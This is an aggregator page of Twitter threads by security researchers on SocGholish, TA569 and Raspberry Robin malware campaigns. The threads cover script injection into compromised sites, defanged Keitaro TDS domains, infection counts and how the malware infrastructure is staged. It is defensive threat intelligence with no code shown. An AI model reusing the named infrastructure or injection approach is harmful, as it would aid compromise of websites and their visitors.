Discover and read the best of Twitter Threads about #SocGholish

Most recents (4)

1/ Part of the script used by #TA569 (Initial Access Broker) to inject the Keitaro TDS code into compromised sites 🚩

In this variant, if the IP is correct and the red_ok cookie is not declared, the injection is shown and the infection flow continues until #SocGholish or others. ImageImageImage
2/ Two #KeitaroTDS domains in use by #TA569:
- jqueryns[.]com
- jqscr[.]com "new"

In the IP of the latter there is also the domain jqueryj[.]com with a panel that at first sight I cannot recognize 🧐 but is some kind of bot/stealer/clipper, very likely related. / @ViriBack ImageImageImageImage
3/ To get an idea of the scope, if we search on publicwww for the domain "jqueryns[.]com" we get 2196 infected sites, for the domain "jqscr[.]com" we get another 196 compromised sites so far.

- publicwww.com/websites/%22jq…
- publicwww.com/websites/%22jq…

More results in Google too 🤦‍♂️ ImageImageImageImage
Read 5 tweets
Proofpoint Threat Research has observed intermittent injections on a media company that serves many major news outlets. This media company serves content via #Javascript to its partners. By modifying the codebase of this otherwise benign JS, it is now used to deploy #SocGholish.
We track this actor as #TA569. TA569 historically removed and reinstated these malicious JS injects on a rotating basis. Therefore the presence of the payload and malicious content can vary from hour to hour and shouldn't be considered a false positive.
Proofpoint observed TA569 injects within the assets of a media company used by multiple major news orgs. More than 250 regional/national newspaper sites have accessed the malicious Javascript. The actual number of impacted hosts is known only by the impacted media company.
Read 5 tweets
Raspberry Robin is a malware that has been around for some time now and spreads via infected USB drives.
Here is what we have seen over the last 10 months. 🧵 1/12 #RaspberryRobin #malware

via @lazy_daemon
@sekoia_io and @redcanary have already published excellent technical analyses of this malware, so we won't go into more detail about it.

7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/…

redcanary.com/blog/raspberry…

🧵 2/12
Since December, 2021, we've seen several cases mostly in Hungary🇭🇺 and Germany🇩🇪 but also a few in Russia🇷🇺 and India🇮🇳.
The user always clicked the malicious link, so no automatic infection when the USB drive was plugged in. 🧵 3/12
Read 12 tweets
Just a quick bit of clarification on #SocGholish on how I personally view the stages/infra.

Thread
Stage 1: The injected site. These are compromised sites where a JavaScript implant is present in the HTML Source of the page.

These are plentiful (more than 1000 active at any time).

They come in 2 varieties currently:

1x B64 encoded and 2x B64 encoded
Stage 2: Payload Host...aka the site Stage 1 pulls the "fakeupdate" from. (/report/blah)

These are less plentiful than Stage 1. Their TTL is measured in days or weeks. There are some currently that are approaching months.

These are a more reliable IOC to block vs Stage 1.
Read 11 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!